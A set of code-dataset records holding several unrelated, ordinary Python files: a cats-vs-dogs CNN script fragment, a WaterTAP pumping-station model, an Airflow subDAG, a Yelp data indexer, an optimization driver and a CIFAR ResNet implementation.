train_y}, n_epoch=epoch, validation_set=({'input': test_x}, {'targets': test_y}),snapshot_step=500, show_metric=True)\n    model.save(name)\n    \n    return model\n    \ndef run_for_test(model,test_set):\n    fig=plt.figure()\n    \n    print(\"writing onto files: \\n\")\n    \n    with open('submission_file.csv','w') as f:\n        f.write('id,label\\n')\n            \n    with open('submission_file.csv','a') as f:\n        for data in test_set:\n            img_num = data[1]\n            img_data = data[0]\n            orig = img_data\n            data = img_data.reshape(size,size,1)\n            model_out = model.predict([data])[0]\n            f.write('{},{}\\n'.format(img_num,model_out[1]))\n    f.close()\n    \n    #For non rounded file \n    csv1 = 'submission_file.csv'\n    file = open(csv1, newline='\\n')\n    reader = csv.reader(file)\n    header = next(reader)\n    data = []\n    for row in reader:\n        img_num = int(row[0])\n        d_or_c = float(row[1])\n        data.append([img_num, d_or_c])\n    \n    data.sort(key = lambda x: 
x[0])\n new_file = 'submission_file_sorted.csv'\n file = open(new_file, 'w')\n writer = csv.writer(file)\n writer.writerow([\"id\", \"label\"])\n for d in data:\n writer.writerow([d[0],d[1]]) \n for num,data in enumerate(test_set[:12]):\n img_num = data[1]\n img_data = data[0]\n \n y = fig.add_subplot(3,4,num+1)\n orig = img_data\n data = img_data.reshape(size,size,1)\n model_out = model.predict([data])[0]\n \n # for rounded file\n csv1 = 'submission_file.csv'\n file = open(csv1, newline='\\n')\n reader = csv.reader(file)\n header = next(reader)\n data = []\n for row in reader:\n img_num = int(row[0])\n d_or_c = float(row[1])\n if d_or_c > 0.5:\n d_or_c = 1\n else:\n d_or_c = 0\n data.append([img_num, d_or_c])\n \n data.sort(key = lambda x: x[0])\n new_file = 'submission_file_roundedandsorted.csv'\n file = open(new_file, 'w')\n writer = csv.writer(file)\n writer.writerow([\"id\", \"label\"])\n for d in data:\n writer.writerow([d[0],d[1]]) \n for num,data in enumerate(test_set[:12]):\n img_num = data[1]\n img_data = data[0]\n \n y = fig.add_subplot(3,4,num+1)\n orig = img_data\n data = img_data.reshape(size,size,1)\n model_out = model.predict([data])[0]\n \n if np.argmax(model_out) == 1: \n str_label='Dog'\n else: \n str_label='Cat'\n \n y.imshow(orig,cmap='gray')\n plt.title(str_label)\n y.axes.get_xaxis().set_visible(False)\n y.axes.get_yaxis().set_visible(False)\n plt.show()\n plt.savefig('cats_and_dogs_epoch_{}'.format(epoch))\n plt.pause(10)\n\n \n \ndef main():\n \n #next four lines are to be executed just once - loading testing and training data sets\n print(\"Creating training dataset... \\n\")\n train_set = create_train_data()\n print(\"Processing testing dataset... \\n\")\n test_set = process_test_data()\n \n #to reset graph for every run\n tf.reset_default_graph()\n \n #workaround for earlier verison of numpy to use np.load \n np_load_old = np.load\n np.load = lambda *a,**k: np_load_old(*a, allow_pickle=True, **k) # modify the default parameters of np.load\n #loading training data\n train_set = np.load('train_set.npy') #len 25000\n test_set = np.load('test_set.npy') #len 12500\n #restoring to curret version\n np.load = np_load_old\n \n #creating flattened image and sending as input\n c_net = input_data(shape = [None,size,size,1], name='input')\n \n #training dataset validation and preparation\n model = validate_train_set(c_net,train_set)\n \n #running for test dataset\n run_for_test(model, test_set)\n \nif __name__ == '__main__':\n main()","sub_path":"Dogs and Cats detection - CNN/catsanddogs.py","file_name":"catsanddogs.py","file_ext":"py","file_size_in_byte":7841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"81527074","text":"#################################################################################\n# WaterTAP Copyright (c) 2020-2023, The Regents of the University of California,\n# through Lawrence Berkeley National Laboratory, Oak Ridge National Laboratory,\n# National Renewable Energy Laboratory, and National Energy Technology\n# Laboratory (subject to receipt of any required approvals from the U.S. Dept.\n# of Energy). All rights reserved.\n#\n# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license\n# information, respectively. 
These files are also available online at the URL\n# \"https://github.com/watertap-org/watertap/\"\n#################################################################################\n\"\"\"\nThis module contains a zero-order representation of a water pumping station.\n\"\"\"\n\nfrom pyomo.environ import units as pyunits, Var\nfrom pyomo.common.config import ConfigValue, In\nfrom idaes.core import declare_process_block_class\nfrom watertap.core import build_pt, ZeroOrderBaseData\nfrom watertap.core.zero_order_electricity import _common\n\n# Some more information about this module\n__author__ = \"Adam Atia\"\n\n\n@declare_process_block_class(\"WaterPumpingStationZO\")\nclass WaterPumpingStationZOData(ZeroOrderBaseData):\n \"\"\"\n Zero-Order model for SW onshore intake operation.\n \"\"\"\n\n CONFIG = ZeroOrderBaseData.CONFIG()\n CONFIG.declare(\n \"fix_pump_power\",\n ConfigValue(\n default=True,\n domain=In([True, False]),\n description=\"Boolean flag for fixing pump power directly.\",\n doc=\"\"\"Indicates whether pump power should be fixed by the user or not.\n **default** - True.\n **Valid values:** {\n **True** - pump power (variable name \"electricity\") will be fixed by user and lift_height will not be fixed,\n **False** - pump power (variable name \"electricity\") is left unfixed and lift_height will be fixed,}\"\"\",\n ),\n )\n\n def build(self):\n super().build()\n\n self._tech_type = \"water_pumping_station\"\n\n build_pt(self)\n\n # create electricity variable and add to performance dictionary\n _common(self)\n\n self.lift_height = Var(\n self.flowsheet().time,\n initialize=100,\n units=pyunits.feet,\n doc=\"Lift height for pump\",\n )\n self.eta_pump = Var(\n self.flowsheet().time,\n initialize=0.9,\n units=pyunits.dimensionless,\n doc=\"Efficiency of pump\",\n )\n self.eta_motor = Var(\n self.flowsheet().time,\n initialize=0.9,\n units=pyunits.dimensionless,\n doc=\"Efficiency of motor\",\n )\n\n self._fixed_perf_vars.append(self.eta_pump)\n self._fixed_perf_vars.append(self.eta_motor)\n\n if not self.config.fix_pump_power:\n self._fixed_perf_vars.append(self.lift_height)\n else:\n self._fixed_perf_vars.append(self.electricity)\n\n @self.Constraint(\n self.flowsheet().time,\n doc=\"Constraint for electricity consumption based on \" \"pump flowrate.\",\n )\n def electricity_consumption(b, t):\n A = (\n 3960\n * pyunits.gallon\n * pyunits.foot\n / pyunits.minute\n / pyunits.horsepower\n )\n return b.electricity[t] == pyunits.convert(\n b.properties[t].flow_vol\n * b.lift_height[t]\n / (A * b.eta_pump[t] * b.eta_motor[t]),\n to_units=pyunits.kW,\n )\n","sub_path":"watertap/unit_models/zero_order/water_pumping_station_zo.py","file_name":"water_pumping_station_zo.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"255108762","text":"from airflow.models import DAG\nfrom airflow.operators import DataQualityOperator\nfrom airflow.operators import LoadFactOperator\n\nimport load_statements\n\n\ndef load_facts(parent_dag_name, child_dag_name, start_date, redshift_conn_id):\n dag = DAG(\n '%s.%s' % (parent_dag_name, child_dag_name),\n start_date=start_date,\n )\n\n load_fact_bookings = LoadFactOperator(\n task_id='load_bookings',\n dag=dag,\n redshift_conn_id=redshift_conn_id,\n sql=load_statements.LOAD_BOOKING_FACTS,\n table='fact_bookings'\n )\n\n run_quality_checks_facts = DataQualityOperator(\n task_id='data_quality_checks_facts',\n dag=dag,\n tables='fact_bookings',\n 
redshift_conn_id=redshift_conn_id,\n sql='SELECT COUNT(*) FROM {}'\n )\n\n load_fact_bookings >> run_quality_checks_facts\n\n return dag\n","sub_path":"airflow/dags/sub_load_facts.py","file_name":"sub_load_facts.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"180623393","text":"import json\n\ndef try_replace(x, delim=''):\n if not x:\n return ''\n return x.replace(',', delim)\n\ncounter = 0\n# Business data credit: https://www.yelp.com/dataset/documentation/main.\n# Only business data are used, no personal review information is necessary.\nwith open('/Users/swzheng/Downloads/yelp_dataset/yelp_academic_dataset_business.json', 'r') as fin, open('index.csv', 'w') as fout:\n for json_line in fin.readlines():\n if counter % 10000 == 0:\n print('%d records inserted' % counter)\n counter += 1\n business_obj = json.loads(json_line)\n fout.write('%s,%s,%s,%f,%f,%s\\n' % (\n try_replace(business_obj['name']),\n try_replace(business_obj['address']),\n try_replace(business_obj['city']),\n business_obj['latitude'],\n business_obj['longitude'],\n try_replace(business_obj['categories'], '.')))\n","sub_path":"build_index.py","file_name":"build_index.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"355068412","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport sys,os,shutil\nimport time\nimport random\nimport Optimization\nfrom optparse import OptionParser\nfrom subprocess import run,check_output\nimport damask\n\n#------------------------------------------------------------------------------------------------- #\n_ratio = None\nclass optimize(Optimization.Optimization):\n\n def id(self,x):\n return str(self.map2space(x[:self.dimension])).translate(str.maketrans(' []','___')) \n \n#===========================================\n def fitness(self,x):\n if self.id(x) in self.locations:\n self.curr_locations.append(np.append(x,self.locations[self.id(x)]))\n return self.locations[self.id(x)]\n\n xvalue = self.map2space(x[:self.dimension])[0]\n yvalue = self.map2space(x[:self.dimension])[1]\n fitness_value = (xvalue**2 + yvalue -11)**2 + (xvalue + yvalue**2 - 7 )**2 #https://en.wikipedia.org/wiki/Test_functions_for_optimization\n print('fitness {}'.format(fitness_value))\n self.locations[self.id(x)] = fitness_value\n \n if not options.concise:\n with open('{}/output_gen{}_{}.log'.format(options.root,self.generation+1,self.id(x)),'a') as file:\n file.write(\"\\n Generation %i \"%(self.generation+1))\n file.write(\"\\n +++++++++++++++++++++++++++++++++ current fitness and points +++++++++++++++++++++++++++\\n\")\n file.write(\"\\n fitness {}\".format(fitness_value))\n file.write(\"\\n points {} parameters{}\".format(x[:self.dimension],self.map2space(x[:self.dimension])))\n file.write(\"\\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\\n\")\n file.close() \n \n return fitness_value\n\n#-------------------------------- main program starts here ----------------------------------------- #\n\nparser = OptionParser()\nparser.add_option( '--root',\n dest = 'root',\n type = 'string', metavar = 'string',\n help = ' desired root of this process ')\nparser.add_option('--restart', action=\"store_true\",\n dest=\"restart\",\n help=\"restart optimization\")\nparser.add_option('-c','--concise', action=\"store_true\",\n dest=\"concise\",\n help=\"concise 
outputs\")\nparser.add_option( '--points',\n dest = 'points_data',\n type = 'string', metavar = 'string',\n help = 'points for next generation ')\n\n#making the default values and let them show\nparser.set_defaults( concise = False,\n )\n(options,filenames) = parser.parse_args()\n\n\noptions.root = os.path.dirname(os.path.realpath(__file__)) if options.root == None else options.root\n\ntick = time.time()\nif options.restart:\n\n table1 = damask.ASCIItable(name = options.points_data, buffered = False)\n table1.head_read()\n table1.data_readArray()\n\n theOptimizer = optimize( method = 'neldermead',\n bounds = np.array([[-10,10],\n [-10,10],\n ]),\n tolerance = 0.01,\n root = options.root,\n concise_outputs = options.concise,\n rigid = True,\n restart = True,\n points_rs = table1.data,\n )\nelse:\n theOptimizer = optimize(method = 'neldermead',\n bounds = np.array([[-10,10],\n [-10,10],\n ]),\n tolerance = 0.01,\n root = options.root,\n concise_outputs = options.concise,\n rigid = True,\n )\n\ntheOptimizer.optimize(verbose = False)\ntock = time.time()\nprint(\"Time for simulation\",(tock - tick))\nprint(\"Cost {}\".format(theOptimizer.cost()))\nprint(\"Best parameters and fitness {}\".format(theOptimizer.best()))\nwith open(\"{}/output_{}.log\".format(options.root,theOptimizer.method),'a') as file:\n file.write(\"\\nTime for simulation {}\".format(tock - tick))\n file.write(\"\\nCost {}\".format(theOptimizer.cost()))\n file.write(\"\\nBest parameters and fitness {}\".format(theOptimizer.best()))","sub_path":"ExampleOptimization/test_HimmelblauNM/abaqus_optimize_Himmelblau_masterCode_NM.py","file_name":"abaqus_optimize_Himmelblau_masterCode_NM.py","file_ext":"py","file_size_in_byte":4484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"208898997","text":"\"\"\"\n ResNet from 'Deep Residual Learning for Image Recognition', Kaiming He et al, CVPR 2015\n\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.hub import load_state_dict_from_url\n\nfrom model.model_utils import register\n\n\n# resnet variants\n__all__ = [\n 'ResNet', 'resnet18', 'resnet34', 'resnet50', 'resnet101',\n 'resnet152', 'resnext50_32x4d', 'resnext101_32x8d',\n 'wide_resnet50_2', 'wide_resnet101_2'\n]\n\n# urls to pretrained resnet models\nmodel_urls = {\n 'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',\n 'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',\n 'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',\n 'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',\n 'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',\n 'resnext50_32x4d': 'https://download.pytorch.org/models/resnext50_32x4d-7cdf4587.pth',\n 'resnext101_32x8d': 'https://download.pytorch.org/models/resnext101_32x8d-8ba56ff5.pth',\n 'wide_resnet50_2': 'https://download.pytorch.org/models/wide_resnet50_2-95faca4d.pth',\n 'wide_resnet101_2': 'https://download.pytorch.org/models/wide_resnet101_2-32ee1156.pth',\n}\n\n# define a conv-3x3 layer with padding\ndef conv3x3(in_planes, out_planes, stride=1, groups=1, dilation=1):\n \"\"\" 3x3 convolution with padding \"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=dilation,\n groups=groups, bias=False, dilation=dilation)\n\n\n# define a conv-1x1 layer -> used often, for simplicity\ndef conv1x1(in_planes, out_planes, stride=1):\n \"\"\" 1x1 convolution \"\"\"\n return 
nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)\n\n\nclass BasicBlock(nn.Module):\n \"\"\"\n Basic res-block for resnet\n\n structure: conv-3x3 -> bn -> relu -> conv-3x3 -> bn -> skip-connect -> relu\n\n input dimension = batch_size x inplanes x H x H\n output dimension = batch_size x planes x H/stride x H/stride\n\n \"\"\"\n\n expansion = 1\n\n def __init__(self, inplanes: int, planes: int, stride=1, downsample=None, groups=1,\n base_width=64, dilation=1, norm_layer=None):\n \"\"\"\n Constructor\n\n Args:\n inplanes: (int) number of input channels\n planes: (int) number of output channels\n stride: (int) stride\n downsample: () downsamples output fmaps -> require dimension matching for skip connection; must set if stride > 1\n groups: (int) BasicBlock only supports default=1\n base_width: (int) BasicBlock only supports default=64\n dilation: (int) dilated convolution; only supports default=1\n norm_layer: (nn.Module) normalization; default=BatchNorm2d\n\n base_width & groups are interfaces for BottleNeck block, here it is fixed to width=64 and groups=1 for no bottleneck\n\n \"\"\"\n\n super(BasicBlock, self).__init__()\n if norm_layer is None:\n norm_layer = nn.BatchNorm2d\n if groups != 1 or base_width != 64:\n raise ValueError('BasicBlock class only supports groups=1 and base_width=64')\n if dilation > 1:\n raise ValueError('BasicBlock class only supports dilation=1')\n\n self.conv1 = conv3x3(inplanes, planes, stride)\n self.bn1 = norm_layer(planes)\n self.conv2 = conv3x3(planes, planes)\n self.bn2 = norm_layer(planes)\n self.downsample = downsample\n self.stride = stride\n\n self.dropout = nn.Dropout(p=0.2)\n\n def _forward_imp1(self, x):\n \"\"\" forward method: no dropout \"\"\"\n identity = x # batch_size x inplanes x H x H\n\n out = self.bn1(self.conv1(x)) # batch_size x planes x H/stride x H/stride -> downsamples if stride > 1\n out = F.relu(out, inplace=True)\n out = self.bn2(self.conv2(out)) # batch_size x planes x H/stride x H/stride -> maintain dimensions\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out += identity # skip connection\n out = F.relu(out, inplace=True)\n\n return out # batch_size x planes x H/stride x H/stride\n\n def _forward_imp2(self, x):\n \"\"\" forward method: dropout after each conv filter \"\"\"\n identity = x # batch_size x inplanes x H x H\n\n out = self.bn1(self.conv1(x)) # batch_size x planes x H/stride x H/stride -> downsamples if stride > 1\n out = F.relu(out, inplace=True)\n out = self.dropout(out)\n out = self.bn2(self.conv2(out)) # batch_size x planes x H/stride x H/stride -> maintain dimensions\n out = self.dropout(out)\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out += identity # skip connection\n out = F.relu(out, inplace=True)\n\n return out # batch_size x planes x H/stride x H/stride\n\n def forward(self, x):\n \"\"\" forward method \"\"\"\n\n return self._forward_imp2(x)\n\n\nclass BottleNeck(nn.Module):\n \"\"\"\n Bottle-necked block\n\n structure: conv-1x1 (decrease width) -> bn/relu -> conv-3x3 (downsample?) 
-> bn/relu -> conv-1x1 (restore width) -> bn -> skip-connect concat -> relu\n\n input dimension = batch_size x inplanes x H x H\n output dimension = batch_size x planes*self.expansion x H/stride x H/stride\n\n \"\"\"\n\n expansion = 4\n\n def __init__(self, inplanes, planes, stride=1, downsample=None, groups=1,\n base_width=64, dilation=1, norm_layer=None):\n \"\"\"\n Constructor\n\n Args:\n inplanes: (int) number of input channels\n planes: (int) number of output channels = planes * self.expansion\n stride: (int) stride\n downsample: (nn.Module) downsamples output fmaps -> require dimension matching for skip connection; must set if stride > 1\n groups: (int) number of groups\n base_width: (int) number of channels per group\n dilation: (int) dilated convolution\n norm_layer: (nn.Module) normalization; default=BatchNorm2d\n\n bottleneck width = planes * base_width / 64 * groups\n - implemened as grouped convolution\n - base_width and groups are used to accomodate implementation of ResNeXt and wide_ResNets\n - for ResNeXt, specify bottleneck width = base_width and cardinality = groups\n - for wide_ResNet, double base_width\n - for vanilla ResNet, set base_width = 64, groups = 1, then bottleneck width = planes -> no bottleneck like BasicBlock\n - can tweak base_width, groups to alter bottleneck widths\n\n \"\"\"\n\n super(BottleNeck, self).__init__()\n\n if norm_layer is None:\n norm_layer = nn.BatchNorm2d\n\n # bottleneck width, implemented from grouped convolution\n # in ResNeXt paper, base_width=4, groups=32, planes=256 -> width=128\n width = int(planes * (base_width / 64.)) * groups\n\n self.conv1 = conv1x1(inplanes, width)\n self.bn1 = norm_layer(width)\n self.conv2 = conv3x3(width, width, stride, groups, dilation)\n self.bn2 = norm_layer(width)\n self.conv3 = conv1x1(width, planes * self.expansion)\n self.bn3 = norm_layer(planes * self.expansion)\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n self.dropout = nn.Dropout(p=0.2)\n\n def _forward_imp1(self, x):\n \"\"\" forward method for BottleNeck class: no dropout \"\"\"\n\n identity = x # batch_size x inplanes x H x H\n\n out = self.relu(self.bn1(self.conv1(x))) # batch_size x width x H x H\n out = self.relu(self.bn2(self.conv2(out))) # batch_size x width x H/stride x H/stride\n out = self.bn3(self.conv3(out)) # batch_size x planes*self.expansion x H/stride x H/stride\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out += identity # skip connection\n out = self.relu(out)\n\n return out # batch_size x planes*self.expansion x H/stride x H/stride\n\n def _forward_imp2(self, x):\n \"\"\" forward method for BottleNeck class: dropout after each conv filter \"\"\"\n\n identity = x # batch_size x inplanes x H x H\n\n out = self.relu(self.bn1(self.conv1(x))) # batch_size x width x H x H\n out = self.dropout(out)\n out = self.relu(self.bn2(self.conv2(out))) # batch_size x width x H/stride x H/stride\n out = self.dropout(out)\n out = self.bn3(self.conv3(out)) # batch_size x planes*self.expansion x H/stride x H/stride\n out = self.dropout(out)\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out += identity # skip connection\n out = self.relu(out)\n\n return out # batch_size x planes*self.expansion x H/stride x H/stride\n\n def forward(self, x):\n \"\"\" forward method \"\"\"\n\n return self._forward_imp2(x)\n\n\nclass ResNet(nn.Module):\n \"\"\"\n ResNet\n\n An abstract network builder class to generate ResNet variants\n\n Common structure:\n\n - 
conv-7x7-s2 -> bn -> relu -> max_pool-3x3-s2\n - res-block (basic / bottleneck) stack: 1\n - res-block (basic / bottleneck) stack: 2\n - res-block (basic / bottleneck) stack: 3\n - res-block (basic / bottleneck) stack: 4\n - global average pool -> flatten -> fc\n\n \"\"\"\n\n def __init__(self, block, stacks, num_classes=10, zero_init_residual=True,\n groups=1, width_per_group=64, replace_stride_with_dilation=None,\n norm_layer=None):\n \"\"\"\n Constructor\n\n Args:\n block: (BasicBlock or BottleNeck class) type of residual block to use as building block for res-stacks\n stacks: (list) a list of 4 integers, each specifying the number of layers (residual blocks) in each of the 4 res-stacks\n num_class: (int) number of final fc layer outputs\n zero_init_residual: (bool) if true initialize the weights of the last BN layer in each residual block to zero\n groups: (int)\n width_per_group: (int)\n replace_stride_with_dilation: (tuple of 3 boolean values) specify whether or not to use dilated conv for\n residual stack 1~3 (strided stacks)\n norm_layer: (nn.Module) nomalization layer; default = nn.BatchNorm2d\n\n \"\"\"\n\n super(ResNet, self).__init__()\n\n if norm_layer is None:\n norm_layer = nn.BatchNorm2d\n\n self._norm_layer = norm_layer\n self.inplanes = 64\n self.dilation = 1\n self.groups = groups\n self.base_width = width_per_group\n\n if replace_stride_with_dilation is None:\n replace_stride_with_dilation = [False, False, False]\n if len(replace_stride_with_dilation) != 3:\n raise ValueError(\"replace_stride_with_dilation should be None\"\n \"or a 3-element tuple, got {}\".format(replace_stride_with_dilation))\n\n self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=3, stride=1, padding=3, bias=False)\n self.bn1 = norm_layer(self.inplanes)\n self.relu = nn.ReLU(inplace=True)\n\n # construt residual stacks\n # 1st stack use no striding, no channel doubling (except block expansion)\n # subsequent stacks use stride=2 in its 1st layer, double channels at final stack output\n # to avoid bottleneck in information flow\n self.stack1 = self._make_stack(block, 64, stacks[0], stride=1)\n self.stack2 = self._make_stack(block, 128, stacks[1], stride=2,\n dilate=replace_stride_with_dilation[0])\n self.stack3 = self._make_stack(block, 256, stacks[2], stride=2,\n dilate=replace_stride_with_dilation[1])\n self.stack4 = self._make_stack(block, 512, stacks[3], stride=2,\n dilate=replace_stride_with_dilation[2])\n\n # global average pooling\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n self.fc = nn.Linear(256 * block.expansion, num_classes)\n\n self.dropout = nn.Dropout(p=0.2)\n\n # initialization\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n # zero-initiate the last BN layer in each residual block (basic or bottleneck)\n if zero_init_residual:\n for m in self.modules():\n if isinstance(m, BottleNeck):\n nn.init.constant_(m.bn3.weight, 0)\n elif isinstance(m, BasicBlock):\n nn.init.constant_(m.bn2.weight, 0)\n\n\n def _make_stack(self, block, planes, blocks, stride=1, dilate=False):\n \"\"\"\n Construct a res-block stack\n\n Args:\n block: (BasicBlock or BottleNeck class) building block for res-stack\n planes: (int) number of output channels (equal for all layers in the stack) = planes * block.expansion\n blocks: (int) number of building blocks (layers) in the stack\n stride: (int) if > 1, apply 
striding to (only) the first layer in the stack\n dilate: (bool) if True enable dilation instead of striding\n\n Structure:\n - 1st layer:\n - if stride > 1, enable striding\n - input = batch_size x self.inplanes x H x H\n - output = batch_size x planes * block.expansion x H/stride x H/stride\n - requires downsampling by conv-1x1\n - subsequent layers:\n - layer_stride =1\n - input = output = batch_size x planes * block.expansion x H/stride x H/stride\n - downsample = None\n\n \"\"\"\n\n norm_layer = self._norm_layer\n downsample = None\n previous_dilation = self.dilation\n\n # use dilation instead of striding if true\n if dilate:\n self.dilation *= stride\n stride = 1\n\n # apply conv-1x1 to input identity if stride > 1 or output channels != input channels for dim. matching\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n conv1x1(self.inplanes, planes * block.expansion, stride),\n norm_layer(planes * block.expansion)\n )\n\n layers = []\n # first layer\n # input = batch_size x self.inplanes x H x H\n # output = batch_size x planes * block.expansion x H/stride x H/stride\n layers.append(block(self.inplanes, planes, stride, downsample, self.groups,\n self.base_width, previous_dilation, norm_layer))\n self.inplanes = planes * block.expansion\n # subsequent layers\n for _ in range(1, blocks):\n # input = output = batch_size x planes * block.expansion x H' x H'\n layers.append(block(self.inplanes, planes, groups=self.groups,\n base_width=self.base_width, dilation=self.dilation,\n norm_layer=norm_layer))\n\n return nn.Sequential(*layers)\n\n\n def _forward_imp1(self, x):\n \"\"\" forward method: no dropout \"\"\"\n # batch_size x 3 x H x H -> 32 x 32 on cifar-10\n x = self.bn1(self.conv1(x)) # batch_size x 64 x H x H -> 32 x 32\n\n x = self.stack1(x) # batch_size x 64*block.expansion x H/2 x H/2 -> 16 x 16\n x = self.stack2(x) # batch_size x 128*block.expansion x H/4 x H/4 -> 8 x 8\n x = self.stack3(x) # batch_size x 256*block.expansion x H/8 x H/8 -> 4 x 4\n\n x = self.avgpool(x) # batch_size x 256*block.expansion x 1 x 1\n x = torch.flatten(x, 1) # batch_size x 256*block.expansion*1*1\n out = self.fc(x) # batch_size x num_classes\n\n return out\n\n def _forward_imp2(self, x):\n \"\"\" forward method: dropout \"\"\"\n # batch_size x 3 x H x H -> 32 x 32 on cifar-10\n x = self.bn1(self.conv1(x)) # batch_size x 64 x H x H -> 32 x 32\n x = self.dropout(x)\n\n x = self.stack1(x) # batch_size x 64*block.expansion x H/2 x H/2 -> 16 x 16\n x = self.dropout(x)\n x = self.stack2(x) # batch_size x 128*block.expansion x H/4 x H/4 -> 8 x 8\n x = self.dropout(x)\n x = self.stack3(x) # batch_size x 256*block.expansion x H/8 x H/8 -> 4 x 4\n x = self.dropout(x)\n\n x = self.avgpool(x) # batch_size x 256*block.expansion x 1 x 1\n x = torch.flatten(x, 1) # batch_size x 256*block.expansion*1*1\n out = self.fc(x) # batch_size x num_classes\n\n return out\n\n def forward(self, x):\n \"\"\" forward method \"\"\"\n return self._forward_imp1(x)\n\n\ndef _resnet(arch, block, layers, pretrained, progress, **kwargs):\n \"\"\"\n Abstract model generator interface\n\n Args:\n arch: (str) architecture of pretrained model\n block: (BasicBlock or BottleNeck) residual block type\n layers: (list) a list of 4 integers each specifying the number of residual blocks for each of the 4 residual stacks\n pretrained: (bool) if true load the weights from pretrained models on ImageNet\n progress: (bool) if true displays a progress bar of the download to stderr\n **kwargs: pointer to 
additional arguments (e.g., groups, stride, etc.)\n\n    \"\"\"\n    model = ResNet(block, layers, **kwargs)\n    if pretrained:\n        state_dict = load_state_dict_from_url(model_urls[arch], progress=progress)\n        model.load_state_dict(state_dict)\n    return model\n\n@register(name='cifar-resnet18')\ndef resnet18(pretrained=False, progress=True, **kwargs):\n    \"\"\" ResNet-18 \"\"\"\n    return _resnet('resnet18', BasicBlock, [2, 2, 2, 2], pretrained, progress, **kwargs)\n\n@register(name='cifar-resnet34')\ndef resnet34(pretrained=False, progress=True, **kwargs):\n    \"\"\" ResNet-34 \"\"\"\n    return _resnet('resnet34', BasicBlock, [3, 4, 6, 3], pretrained, progress, **kwargs)\n\n@register(name='cifar-resnet50')\ndef resnet50(pretrained=False, progress=True, **kwargs):\n    \"\"\" ResNet-50 \"\"\"\n    return _resnet('resnet50', BottleNeck, [3, 4, 6, 3], pretrained, progress, **kwargs)\n\n@register(name='cifar-resnet101')\ndef resnet101(pretrained=False, progress=True, **kwargs):\n    \"\"\" ResNet-101 \"\"\"\n    return _resnet('resnet101', BottleNeck, [3, 4, 23, 3], pretrained, progress, **kwargs)\n\n@register(name='cifar-resnet152')\ndef resnet152(pretrained=False, progress=True, **kwargs):\n    \"\"\" ResNet-152 \"\"\"\n    return _resnet('resnet152', BottleNeck, [3, 8, 36, 3], pretrained, progress, **kwargs)\n\n@register(name='cifar-resnext50_32x4d')\ndef resnext50_32x4d(pretrained=False, progress=True, **kwargs):\n    \"\"\"\n    ResNeXt-50 32x4d\n        layer = 50\n        cardinality = 32\n        bottleneck base_width = 4 (width_per_group)\n    \"\"\"\n    kwargs['groups'] = 32\n    kwargs['width_per_group'] = 4\n    return _resnet('resnext50_32x4d', BottleNeck, [3, 4, 6, 3], pretrained, progress, **kwargs)\n\n@register(name='cifar-resnext101_32x8d')\ndef resnext101_32x8d(pretrained=False, progress=True, **kwargs):\n    \"\"\"\n    ResNeXt-101 32x8d\n        layer = 101\n        cardinality = 32\n        bottleneck base_width = 8\n    \"\"\"\n    kwargs['groups'] = 32\n    kwargs['width_per_group'] = 8\n    return _resnet('resnext101_32x8d', BottleNeck, [3, 4, 23, 3], pretrained, progress, **kwargs)\n\n@register(name='cifar-wide_resnet50_2')\ndef wide_resnet50_2(pretrained=False, progress=True, **kwargs):\n    \"\"\"\n    wide ResNet-50-2\n    - model is the same as ResNet-50, except bottleneck base_width is doubled\n    \"\"\"\n    kwargs['width_per_group'] = 64 * 2\n    return _resnet('wide_resnet50_2', BottleNeck, [3, 4, 6, 3], pretrained, progress, **kwargs)\n\n@register(name='cifar-wide_resnet101_2')\ndef wide_resnet101_2(pretrained=False, progress=True, **kwargs):\n    \"\"\"\n    wide ResNet-101-2\n    - model is the same as ResNet-101, except bottleneck base_width is doubled\n    \"\"\"\n    kwargs['width_per_group'] = 64 * 2\n    return _resnet('wide_resnet101_2', BottleNeck, [3, 4, 23, 3], pretrained, progress, **kwargs)\n","sub_path":"model/resnet_cifar.py","file_name":"resnet_cifar.py","file_ext":"py","file_size_in_byte":21709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
